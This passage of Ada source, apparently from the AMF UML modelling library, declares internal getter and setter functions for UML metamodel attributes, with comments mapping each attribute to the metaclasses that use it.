UMLCompositeStructureDiagram => UMLDiagram::isFrame -- UMLDeploymentDiagram => UMLDiagram::isFrame -- UMLInteractionDiagram => UMLDiagram::isFrame -- UMLObjectDiagram => UMLDiagram::isFrame -- UMLPackageDiagram => UMLDiagram::isFrame -- UMLProfileDiagram => UMLDiagram::isFrame -- UMLStateMachineDiagram => UMLDiagram::isFrame -- UMLUseCaseDiagram => UMLDiagram::isFrame function Internal_Get_Is_ID (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_ID (Self : AMF.Internals.AMF_Element; To : Boolean); -- ExtensionEnd => Property::isID -- Port => Property::isID -- Property => Property::isID function Internal_Get_Is_Icon (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Icon (Self : AMF.Internals.AMF_Element; To : Boolean); -- UMLActivityDiagram => UMLDiagramElement::isIcon -- UMLAssociationEndLabel => UMLDiagramElement::isIcon -- UMLAssociationOrConnectorOrLinkShape => UMLDiagramElement::isIcon -- UMLClassDiagram => UMLDiagramElement::isIcon -- UMLClassifierShape => UMLDiagramElement::isIcon -- UMLCompartment => UMLDiagramElement::isIcon -- UMLCompartmentableShape => UMLDiagramElement::isIcon -- UMLComponentDiagram => UMLDiagramElement::isIcon -- UMLCompositeStructureDiagram => UMLDiagramElement::isIcon -- UMLDeploymentDiagram => UMLDiagramElement::isIcon -- UMLEdge => UMLDiagramElement::isIcon -- UMLInteractionDiagram => UMLDiagramElement::isIcon -- UMLInteractionTableLabel => UMLDiagramElement::isIcon -- UMLKeywordLabel => UMLDiagramElement::isIcon -- UMLLabel => UMLDiagramElement::isIcon -- UMLMultiplicityLabel => UMLDiagramElement::isIcon -- UMLNameLabel => UMLDiagramElement::isIcon -- UMLObjectDiagram => UMLDiagramElement::isIcon -- UMLPackageDiagram => UMLDiagramElement::isIcon -- UMLProfileDiagram => UMLDiagramElement::isIcon -- UMLRedefinesLabel => UMLDiagramElement::isIcon -- UMLShape => UMLDiagramElement::isIcon -- UMLStateMachineDiagram => UMLDiagramElement::isIcon -- UMLStateShape => UMLDiagramElement::isIcon -- UMLStereotypePropertyValueLabel => UMLDiagramElement::isIcon -- UMLTypedElementLabel => UMLDiagramElement::isIcon -- UMLUseCaseDiagram => UMLDiagramElement::isIcon function Internal_Get_Is_Indent_For_Visibility (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Indent_For_Visibility (Self : AMF.Internals.AMF_Element; To : Boolean); -- UMLClassifierShape => UMLClassifierShape::isIndentForVisibility function Internal_Get_Is_Indirectly_Instantiated (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Indirectly_Instantiated (Self : AMF.Internals.AMF_Element; To : Boolean); -- Component => Component::isIndirectlyInstantiated function Internal_Get_Is_Iso (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Iso (Self : AMF.Internals.AMF_Element; To : Boolean); -- UMLActivityDiagram => UMLDiagram::isIso -- UMLClassDiagram => UMLDiagram::isIso -- UMLComponentDiagram => UMLDiagram::isIso -- UMLCompositeStructureDiagram => UMLDiagram::isIso -- UMLDeploymentDiagram => UMLDiagram::isIso -- UMLInteractionDiagram => UMLDiagram::isIso -- UMLObjectDiagram => UMLDiagram::isIso -- UMLPackageDiagram => UMLDiagram::isIso -- UMLProfileDiagram => UMLDiagram::isIso -- UMLStateMachineDiagram => UMLDiagram::isIso -- UMLUseCaseDiagram => UMLDiagram::isIso function Internal_Get_Is_Leaf (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Leaf (Self : AMF.Internals.AMF_Element; To : Boolean); -- AcceptCallAction => RedefinableElement::isLeaf -- AcceptEventAction => RedefinableElement::isLeaf -- ActionInputPin => RedefinableElement::isLeaf -- Activity => RedefinableElement::isLeaf -- ActivityFinalNode => RedefinableElement::isLeaf -- ActivityParameterNode => RedefinableElement::isLeaf -- Actor => RedefinableElement::isLeaf -- AddStructuralFeatureValueAction => RedefinableElement::isLeaf -- AddVariableValueAction => RedefinableElement::isLeaf -- Artifact => RedefinableElement::isLeaf -- Association => RedefinableElement::isLeaf -- AssociationClass => RedefinableElement::isLeaf -- BroadcastSignalAction => RedefinableElement::isLeaf -- CallBehaviorAction => RedefinableElement::isLeaf -- CallOperationAction => RedefinableElement::isLeaf -- CentralBufferNode => RedefinableElement::isLeaf -- Class => RedefinableElement::isLeaf -- ClearAssociationAction => RedefinableElement::isLeaf -- ClearStructuralFeatureAction => RedefinableElement::isLeaf -- ClearVariableAction => RedefinableElement::isLeaf -- Collaboration => RedefinableElement::isLeaf -- CommunicationPath => RedefinableElement::isLeaf -- Component => RedefinableElement::isLeaf -- ConditionalNode => RedefinableElement::isLeaf -- Connector => RedefinableElement::isLeaf -- ControlFlow => RedefinableElement::isLeaf -- CreateLinkAction => RedefinableElement::isLeaf -- CreateLinkObjectAction => RedefinableElement::isLeaf -- CreateObjectAction => RedefinableElement::isLeaf -- DataStoreNode => RedefinableElement::isLeaf -- DataType => RedefinableElement::isLeaf -- DecisionNode => RedefinableElement::isLeaf -- DeploymentSpecification => RedefinableElement::isLeaf -- DestroyLinkAction => RedefinableElement::isLeaf -- DestroyObjectAction => RedefinableElement::isLeaf -- Device => RedefinableElement::isLeaf -- Enumeration => RedefinableElement::isLeaf -- ExecutionEnvironment => RedefinableElement::isLeaf -- ExpansionNode => RedefinableElement::isLeaf -- ExpansionRegion => RedefinableElement::isLeaf -- Extension => RedefinableElement::isLeaf -- ExtensionEnd => RedefinableElement::isLeaf -- ExtensionPoint => RedefinableElement::isLeaf -- FinalState => RedefinableElement::isLeaf -- FlowFinalNode => RedefinableElement::isLeaf -- ForkNode => RedefinableElement::isLeaf -- FunctionBehavior => RedefinableElement::isLeaf -- InformationItem => RedefinableElement::isLeaf -- InitialNode => RedefinableElement::isLeaf -- InputPin => RedefinableElement::isLeaf -- Interaction => RedefinableElement::isLeaf -- Interface => RedefinableElement::isLeaf -- JoinNode => RedefinableElement::isLeaf -- LoopNode => RedefinableElement::isLeaf -- MergeNode => RedefinableElement::isLeaf -- Node => RedefinableElement::isLeaf -- ObjectFlow => RedefinableElement::isLeaf -- OpaqueAction => RedefinableElement::isLeaf -- OpaqueBehavior => RedefinableElement::isLeaf -- Operation => RedefinableElement::isLeaf -- OutputPin => RedefinableElement::isLeaf -- Port => RedefinableElement::isLeaf -- PrimitiveType => RedefinableElement::isLeaf -- Property => RedefinableElement::isLeaf -- ProtocolStateMachine => RedefinableElement::isLeaf -- ProtocolTransition => RedefinableElement::isLeaf -- RaiseExceptionAction => RedefinableElement::isLeaf -- ReadExtentAction => RedefinableElement::isLeaf -- ReadIsClassifiedObjectAction => RedefinableElement::isLeaf -- ReadLinkAction => RedefinableElement::isLeaf -- ReadLinkObjectEndAction => RedefinableElement::isLeaf -- ReadLinkObjectEndQualifierAction => RedefinableElement::isLeaf -- ReadSelfAction => RedefinableElement::isLeaf -- ReadStructuralFeatureAction => RedefinableElement::isLeaf -- ReadVariableAction => RedefinableElement::isLeaf -- Reception => RedefinableElement::isLeaf -- ReclassifyObjectAction => RedefinableElement::isLeaf -- RedefinableTemplateSignature => RedefinableElement::isLeaf -- ReduceAction => RedefinableElement::isLeaf -- Region => RedefinableElement::isLeaf -- RemoveStructuralFeatureValueAction => RedefinableElement::isLeaf -- RemoveVariableValueAction => RedefinableElement::isLeaf -- ReplyAction => RedefinableElement::isLeaf -- SendObjectAction => RedefinableElement::isLeaf -- SendSignalAction => RedefinableElement::isLeaf -- SequenceNode => RedefinableElement::isLeaf -- Signal => RedefinableElement::isLeaf -- StartClassifierBehaviorAction => RedefinableElement::isLeaf -- StartObjectBehaviorAction => RedefinableElement::isLeaf -- State => RedefinableElement::isLeaf -- StateMachine => RedefinableElement::isLeaf -- Stereotype => RedefinableElement::isLeaf -- StructuredActivityNode => RedefinableElement::isLeaf -- TestIdentityAction => RedefinableElement::isLeaf -- Transition => RedefinableElement::isLeaf -- UnmarshallAction => RedefinableElement::isLeaf -- UseCase => RedefinableElement::isLeaf -- ValuePin => RedefinableElement::isLeaf -- ValueSpecificationAction => RedefinableElement::isLeaf function Internal_Get_Is_Locally_Reentrant (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Locally_Reentrant (Self : AMF.Internals.AMF_Element; To : Boolean); -- AcceptCallAction => Action::isLocallyReentrant -- AcceptEventAction => Action::isLocallyReentrant -- AddStructuralFeatureValueAction => Action::isLocallyReentrant -- AddVariableValueAction => Action::isLocallyReentrant -- BroadcastSignalAction => Action::isLocallyReentrant -- CallBehaviorAction => Action::isLocallyReentrant -- CallOperationAction => Action::isLocallyReentrant -- ClearAssociationAction => Action::isLocallyReentrant -- ClearStructuralFeatureAction => Action::isLocallyReentrant -- ClearVariableAction => Action::isLocallyReentrant -- ConditionalNode => Action::isLocallyReentrant -- CreateLinkAction => Action::isLocallyReentrant -- CreateLinkObjectAction => Action::isLocallyReentrant -- CreateObjectAction => Action::isLocallyReentrant -- DestroyLinkAction => Action::isLocallyReentrant -- DestroyObjectAction => Action::isLocallyReentrant -- ExpansionRegion => Action::isLocallyReentrant -- LoopNode => Action::isLocallyReentrant -- OpaqueAction => Action::isLocallyReentrant -- RaiseExceptionAction => Action::isLocallyReentrant -- ReadExtentAction => Action::isLocallyReentrant -- ReadIsClassifiedObjectAction => Action::isLocallyReentrant -- ReadLinkAction => Action::isLocallyReentrant -- ReadLinkObjectEndAction => Action::isLocallyReentrant -- ReadLinkObjectEndQualifierAction => Action::isLocallyReentrant -- ReadSelfAction => Action::isLocallyReentrant -- ReadStructuralFeatureAction => Action::isLocallyReentrant -- ReadVariableAction => Action::isLocallyReentrant -- ReclassifyObjectAction => Action::isLocallyReentrant -- ReduceAction => Action::isLocallyReentrant -- RemoveStructuralFeatureValueAction => Action::isLocallyReentrant -- RemoveVariableValueAction => Action::isLocallyReentrant -- ReplyAction => Action::isLocallyReentrant -- SendObjectAction => Action::isLocallyReentrant -- SendSignalAction => Action::isLocallyReentrant -- SequenceNode => Action::isLocallyReentrant -- StartClassifierBehaviorAction => Action::isLocallyReentrant -- StartObjectBehaviorAction => Action::isLocallyReentrant -- StructuredActivityNode => Action::isLocallyReentrant -- TestIdentityAction => Action::isLocallyReentrant -- UnmarshallAction => Action::isLocallyReentrant -- ValueSpecificationAction => Action::isLocallyReentrant function Internal_Get_Is_Multicast (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Multicast (Self : AMF.Internals.AMF_Element; To : Boolean); -- ObjectFlow => ObjectFlow::isMulticast function Internal_Get_Is_Multireceive (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Multireceive (Self : AMF.Internals.AMF_Element; To : Boolean); -- ObjectFlow => ObjectFlow::isMultireceive function Internal_Get_Is_Ordered (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Ordered (Self : AMF.Internals.AMF_Element; To : Boolean); -- ActionInputPin => MultiplicityElement::isOrdered -- ConnectorEnd => MultiplicityElement::isOrdered -- ExtensionEnd => MultiplicityElement::isOrdered -- InputPin => MultiplicityElement::isOrdered -- Operation => Operation::isOrdered -- OutputPin => MultiplicityElement::isOrdered -- Parameter => MultiplicityElement::isOrdered -- Port => MultiplicityElement::isOrdered -- Property => MultiplicityElement::isOrdered -- ReduceAction => ReduceAction::isOrdered -- ValuePin => MultiplicityElement::isOrdered -- Variable => MultiplicityElement::isOrdered function Internal_Get_Is_Orthogonal (Self : AMF.Internals.AMF_Element) return Boolean; -- FinalState => State::isOrthogonal -- State => State::isOrthogonal function Internal_Get_Is_Query (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Query (Self : AMF.Internals.AMF_Element; To : Boolean); -- Operation => Operation::isQuery function Internal_Get_Is_Read_Only (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Read_Only (Self : AMF.Internals.AMF_Element; To : Boolean); -- Activity => Activity::isReadOnly -- ExtensionEnd => Property::isReadOnly -- Port => Property::isReadOnly -- Property => Property::isReadOnly function Internal_Get_Is_Reentrant (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Reentrant (Self : AMF.Internals.AMF_Element; To : Boolean); -- Activity => Behavior::isReentrant -- FunctionBehavior => Behavior::isReentrant -- Interaction => Behavior::isReentrant -- OpaqueBehavior => Behavior::isReentrant -- ProtocolStateMachine => Behavior::isReentrant -- StateMachine => Behavior::isReentrant function Internal_Get_Is_Relative (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Relative (Self : AMF.Internals.AMF_Element; To : Boolean); -- TimeEvent => TimeEvent::isRelative function Internal_Get_Is_Remove_Duplicates (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Remove_Duplicates (Self : AMF.Internals.AMF_Element; To : Boolean); -- RemoveStructuralFeatureValueAction => RemoveStructuralFeatureValueAction::isRemoveDuplicates -- RemoveVariableValueAction => RemoveVariableValueAction::isRemoveDuplicates function Internal_Get_Is_Replace_All (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Replace_All (Self : AMF.Internals.AMF_Element; To : Boolean); -- AddStructuralFeatureValueAction => AddStructuralFeatureValueAction::isReplaceAll -- AddVariableValueAction => AddVariableValueAction::isReplaceAll -- LinkEndCreationData => LinkEndCreationData::isReplaceAll -- ReclassifyObjectAction => ReclassifyObjectAction::isReplaceAll function Internal_Get_Is_Required (Self : AMF.Internals.AMF_Element) return Boolean; -- Extension => Extension::isRequired function Internal_Get_Is_Service (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Service (Self : AMF.Internals.AMF_Element; To : Boolean); -- Port => Port::isService function Internal_Get_Is_Simple (Self : AMF.Internals.AMF_Element) return Boolean; -- FinalState => State::isSimple -- State => State::isSimple function Internal_Get_Is_Single_Execution (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Single_Execution (Self : AMF.Internals.AMF_Element; To : Boolean); -- Activity => Activity::isSingleExecution function Internal_Get_Is_Static (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Static (Self : AMF.Internals.AMF_Element; To : Boolean); -- Connector => Feature::isStatic -- ExtensionEnd => Feature::isStatic -- Operation => Feature::isStatic -- Port => Feature::isStatic -- Property => Feature::isStatic -- Reception => Feature::isStatic function Internal_Get_Is_Stream (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Stream (Self : AMF.Internals.AMF_Element; To : Boolean); -- Parameter => Parameter::isStream function Internal_Get_Is_Strict (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Strict (Self : AMF.Internals.AMF_Element; To : Boolean); -- ProfileApplication => ProfileApplication::isStrict function Internal_Get_Is_Submachine_State (Self : AMF.Internals.AMF_Element) return Boolean; -- FinalState => State::isSubmachineState -- State => State::isSubmachineState function Internal_Get_Is_Substitutable (Self : AMF.Internals.AMF_Element) return AMF.Optional_Boolean; procedure Internal_Set_Is_Substitutable (Self : AMF.Internals.AMF_Element; To : AMF.Optional_Boolean); -- Generalization => Generalization::isSubstitutable function Internal_Get_Is_Synchronous (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Synchronous (Self : AMF.Internals.AMF_Element; To : Boolean); -- CallBehaviorAction => CallAction::isSynchronous -- CallOperationAction => CallAction::isSynchronous -- StartObjectBehaviorAction => CallAction::isSynchronous function Internal_Get_Is_Tabbed (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Tabbed (Self : AMF.Internals.AMF_Element; To : Boolean); -- UMLStateShape => UMLStateShape::isTabbed function Internal_Get_Is_Tested_First (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Tested_First (Self : AMF.Internals.AMF_Element; To : Boolean); -- LoopNode => LoopNode::isTestedFirst function Internal_Get_Is_Transition_Oriented (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Transition_Oriented (Self : AMF.Internals.AMF_Element; To : Boolean); -- UMLStateMachineDiagram => UMLStateMachineDiagram::isTransitionOriented function Internal_Get_Is_Unique (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Unique (Self : AMF.Internals.AMF_Element; To : Boolean); -- ActionInputPin => MultiplicityElement::isUnique -- ConnectorEnd => MultiplicityElement::isUnique -- ExtensionEnd => MultiplicityElement::isUnique -- InputPin => MultiplicityElement::isUnique -- Operation => Operation::isUnique -- OutputPin => MultiplicityElement::isUnique -- Parameter => MultiplicityElement::isUnique -- Port => MultiplicityElement::isUnique -- Property => MultiplicityElement::isUnique -- ValuePin => MultiplicityElement::isUnique -- Variable => MultiplicityElement::isUnique function Internal_Get_Is_Unmarshall (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Unmarshall (Self : AMF.Internals.AMF_Element; To : Boolean); -- AcceptCallAction => AcceptEventAction::isUnmarshall -- AcceptEventAction => AcceptEventAction::isUnmarshall function Internal_Get_Join_Spec (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Join_Spec (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- JoinNode => JoinNode::joinSpec function Internal_Get_Kind (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Connector_Kind; -- Connector => Connector::kind function Internal_Get_Kind (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Pseudostate_Kind; procedure Internal_Set_Kind (Self : AMF.Internals.AMF_Element; To : AMF.UML.UML_Pseudostate_Kind); -- Pseudostate => Pseudostate::kind function Internal_Get_Kind (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Transition_Kind; procedure Internal_Set_Kind (Self : AMF.Internals.AMF_Element; To : AMF.UML.UML_Transition_Kind); -- ProtocolTransition => Transition::kind -- Transition => Transition::kind function Internal_Get_Kind (Self : AMF.Internals.AMF_Element) return AMF.UMLDI.UMLDI_UML_Association_Or_Connector_Or_Link_Shape_Kind; procedure Internal_Set_Kind (Self : AMF.Internals.AMF_Element; To : AMF.UMLDI.UMLDI_UML_Association_Or_Connector_Or_Link_Shape_Kind); -- UMLAssociationOrConnectorOrLinkShape => UMLAssociationOrConnectorOrLinkShape::kind function Internal_Get_Kind (Self : AMF.Internals.AMF_Element) return AMF.UMLDI.UMLDI_UML_Interaction_Diagram_Kind; procedure Internal_Set_Kind (Self : AMF.Internals.AMF_Element; To : AMF.UMLDI.UMLDI_UML_Interaction_Diagram_Kind); -- UMLInteractionDiagram => UMLInteractionDiagram::kind function Internal_Get_Kind (Self : AMF.Internals.AMF_Element) return AMF.UMLDI.UMLDI_UML_Interaction_Table_Label_Kind; procedure Internal_Set_Kind (Self : AMF.Internals.AMF_Element; To : AMF.UMLDI.UMLDI_UML_Interaction_Table_Label_Kind); -- UMLInteractionTableLabel => UMLInteractionTableLabel::kind function Internal_Get_Language (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_String; -- FunctionBehavior => OpaqueBehavior::language -- OpaqueAction => OpaqueAction::language -- OpaqueBehavior => OpaqueBehavior::language -- OpaqueExpression => OpaqueExpression::language function Internal_Get_Lifeline (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Interaction => Interaction::lifeline function Internal_Get_Local_Postcondition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => Action::localPostcondition -- AcceptEventAction => Action::localPostcondition -- AddStructuralFeatureValueAction => Action::localPostcondition -- AddVariableValueAction => Action::localPostcondition -- BroadcastSignalAction => Action::localPostcondition -- CallBehaviorAction => Action::localPostcondition -- CallOperationAction => Action::localPostcondition -- ClearAssociationAction => Action::localPostcondition -- ClearStructuralFeatureAction => Action::localPostcondition -- ClearVariableAction => Action::localPostcondition -- ConditionalNode => Action::localPostcondition -- CreateLinkAction => Action::localPostcondition -- CreateLinkObjectAction => Action::localPostcondition -- CreateObjectAction => Action::localPostcondition -- DestroyLinkAction => Action::localPostcondition -- DestroyObjectAction => Action::localPostcondition -- ExpansionRegion => Action::localPostcondition -- LoopNode => Action::localPostcondition -- OpaqueAction => Action::localPostcondition -- RaiseExceptionAction => Action::localPostcondition -- ReadExtentAction => Action::localPostcondition -- ReadIsClassifiedObjectAction => Action::localPostcondition -- ReadLinkAction => Action::localPostcondition -- ReadLinkObjectEndAction => Action::localPostcondition -- ReadLinkObjectEndQualifierAction => Action::localPostcondition -- ReadSelfAction => Action::localPostcondition -- ReadStructuralFeatureAction => Action::localPostcondition -- ReadVariableAction => Action::localPostcondition -- ReclassifyObjectAction => Action::localPostcondition -- ReduceAction => Action::localPostcondition -- RemoveStructuralFeatureValueAction => Action::localPostcondition -- RemoveVariableValueAction => Action::localPostcondition -- ReplyAction => Action::localPostcondition -- SendObjectAction => Action::localPostcondition -- SendSignalAction => Action::localPostcondition -- SequenceNode => Action::localPostcondition -- StartClassifierBehaviorAction => Action::localPostcondition -- StartObjectBehaviorAction => Action::localPostcondition -- StructuredActivityNode => Action::localPostcondition -- TestIdentityAction => Action::localPostcondition -- UnmarshallAction => Action::localPostcondition -- ValueSpecificationAction => Action::localPostcondition function Internal_Get_Local_Precondition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => Action::localPrecondition -- AcceptEventAction => Action::localPrecondition -- AddStructuralFeatureValueAction => Action::localPrecondition -- AddVariableValueAction => Action::localPrecondition -- BroadcastSignalAction => Action::localPrecondition -- CallBehaviorAction => Action::localPrecondition -- CallOperationAction => Action::localPrecondition -- ClearAssociationAction => Action::localPrecondition -- ClearStructuralFeatureAction => Action::localPrecondition -- ClearVariableAction => Action::localPrecondition -- ConditionalNode => Action::localPrecondition -- CreateLinkAction => Action::localPrecondition -- CreateLinkObjectAction => Action::localPrecondition -- CreateObjectAction => Action::localPrecondition -- DestroyLinkAction => Action::localPrecondition -- DestroyObjectAction => Action::localPrecondition -- ExpansionRegion => Action::localPrecondition -- LoopNode => Action::localPrecondition -- OpaqueAction => Action::localPrecondition -- RaiseExceptionAction => Action::localPrecondition -- ReadExtentAction => Action::localPrecondition -- ReadIsClassifiedObjectAction => Action::localPrecondition -- ReadLinkAction => Action::localPrecondition -- ReadLinkObjectEndAction => Action::localPrecondition -- ReadLinkObjectEndQualifierAction => Action::localPrecondition -- ReadSelfAction => Action::localPrecondition -- ReadStructuralFeatureAction => Action::localPrecondition -- ReadVariableAction => Action::localPrecondition -- ReclassifyObjectAction => Action::localPrecondition -- ReduceAction => Action::localPrecondition -- RemoveStructuralFeatureValueAction => Action::localPrecondition -- RemoveVariableValueAction => Action::localPrecondition -- ReplyAction => Action::localPrecondition -- SendObjectAction => Action::localPrecondition -- SendSignalAction => Action::localPrecondition -- SequenceNode => Action::localPrecondition -- StartClassifierBehaviorAction => Action::localPrecondition -- StartObjectBehaviorAction => Action::localPrecondition -- StructuredActivityNode => Action::localPrecondition -- TestIdentityAction => Action::localPrecondition -- UnmarshallAction => Action::localPrecondition -- ValueSpecificationAction => Action::localPrecondition function Internal_Get_Local_Style (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Local_Style (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- UMLActivityDiagram => UMLDiagramElement::localStyle -- UMLAssociationEndLabel => UMLDiagramElement::localStyle -- UMLAssociationOrConnectorOrLinkShape => UMLDiagramElement::localStyle -- UMLClassDiagram => UMLDiagramElement::localStyle -- UMLClassifierShape => UMLDiagramElement::localStyle -- UMLCompartment => UMLDiagramElement::localStyle -- UMLCompartmentableShape => UMLDiagramElement::localStyle -- UMLComponentDiagram => UMLDiagramElement::localStyle -- UMLCompositeStructureDiagram => UMLDiagramElement::localStyle -- UMLDeploymentDiagram => UMLDiagramElement::localStyle -- UMLEdge => UMLDiagramElement::localStyle -- UMLInteractionDiagram => UMLDiagramElement::localStyle -- UMLInteractionTableLabel => UMLDiagramElement::localStyle -- UMLKeywordLabel => UMLDiagramElement::localStyle -- UMLLabel => UMLDiagramElement::localStyle -- UMLMultiplicityLabel => UMLDiagramElement::localStyle -- UMLNameLabel => UMLDiagramElement::localStyle -- UMLObjectDiagram => UMLDiagramElement::localStyle -- UMLPackageDiagram => UMLDiagramElement::localStyle -- UMLProfileDiagram => UMLDiagramElement::localStyle -- UMLRedefinesLabel => UMLDiagramElement::localStyle -- UMLShape => UMLDiagramElement::localStyle -- UMLStateMachineDiagram => UMLDiagramElement::localStyle -- UMLStateShape => UMLDiagramElement::localStyle -- UMLStereotypePropertyValueLabel => UMLDiagramElement::localStyle -- UMLTypedElementLabel => UMLDiagramElement::localStyle -- UMLUseCaseDiagram => UMLDiagramElement::localStyle function Internal_Get_Location (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Location (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Deployment => Deployment::location function Internal_Get_Location (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Location (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- Image => Image::location function Internal_Get_Loop_Variable (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- LoopNode => LoopNode::loopVariable function Internal_Get_Loop_Variable_Input (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- LoopNode => LoopNode::loopVariableInput function Internal_Get_Lower (Self : AMF.Internals.AMF_Element) return AMF.Optional_Integer; procedure Internal_Set_Lower (Self : AMF.Internals.AMF_Element; To : AMF.Optional_Integer); -- ActionInputPin => MultiplicityElement::lower -- ConnectorEnd => MultiplicityElement::lower -- ExtensionEnd => ExtensionEnd::lower -- InputPin => MultiplicityElement::lower -- Operation => Operation::lower -- OutputPin => MultiplicityElement::lower -- Parameter => MultiplicityElement::lower -- Port => MultiplicityElement::lower -- Property => MultiplicityElement::lower -- ValuePin => MultiplicityElement::lower -- Variable => MultiplicityElement::lower function Internal_Get_Lower_Value (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Lower_Value (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActionInputPin => MultiplicityElement::lowerValue -- ConnectorEnd => MultiplicityElement::lowerValue -- ExtensionEnd => MultiplicityElement::lowerValue -- InputPin => MultiplicityElement::lowerValue -- OutputPin => MultiplicityElement::lowerValue -- Parameter => MultiplicityElement::lowerValue -- Port => MultiplicityElement::lowerValue -- Property => MultiplicityElement::lowerValue -- ValuePin => MultiplicityElement::lowerValue -- Variable => MultiplicityElement::lowerValue function Internal_Get_Manifestation (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Artifact => Artifact::manifestation -- DeploymentSpecification => Artifact::manifestation function Internal_Get_Mapping (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Mapping (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Abstraction => Abstraction::mapping -- ComponentRealization => Abstraction::mapping -- InterfaceRealization => Abstraction::mapping -- Manifestation => Abstraction::mapping -- Realization => Abstraction::mapping -- Substitution => Abstraction::mapping function Internal_Get_Max (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Max (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- DurationInterval => DurationInterval::max -- Interval => Interval::max -- TimeInterval => Interval::max function Internal_Get_Maxint (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Maxint (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- InteractionConstraint => InteractionConstraint::maxint function Internal_Get_Member (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Namespace::member -- Actor => Namespace::member -- Artifact => Namespace::member -- Association => Namespace::member -- AssociationClass => Namespace::member -- Class => Namespace::member -- Collaboration => Namespace::member -- CommunicationPath => Namespace::member -- Component => Namespace::member -- ConditionalNode => Namespace::member -- DataType => Namespace::member -- DeploymentSpecification => Namespace::member -- Device => Namespace::member -- Enumeration => Namespace::member -- ExecutionEnvironment => Namespace::member -- ExpansionRegion => Namespace::member -- Extension => Namespace::member -- FinalState => Namespace::member -- FunctionBehavior => Namespace::member -- InformationItem => Namespace::member -- Interaction => Namespace::member -- InteractionOperand => Namespace::member -- Interface => Namespace::member -- LoopNode => Namespace::member -- Model => Namespace::member -- Node => Namespace::member -- OpaqueBehavior => Namespace::member -- Operation => Namespace::member -- Package => Namespace::member -- PrimitiveType => Namespace::member -- Profile => Namespace::member -- ProtocolStateMachine => Namespace::member -- ProtocolTransition => Namespace::member -- Reception => Namespace::member -- Region => Namespace::member -- SequenceNode => Namespace::member -- Signal => Namespace::member -- State => Namespace::member -- StateMachine => Namespace::member -- Stereotype => Namespace::member -- StructuredActivityNode => Namespace::member -- Transition => Namespace::member -- UseCase => Namespace::member function Internal_Get_Member_End (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Association => Association::memberEnd -- AssociationClass => Association::memberEnd -- CommunicationPath => Association::memberEnd -- Extension => Association::memberEnd function Internal_Get_Merged_Package (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Merged_Package (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- PackageMerge => PackageMerge::mergedPackage function Internal_Get_Message (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ConsiderIgnoreFragment => 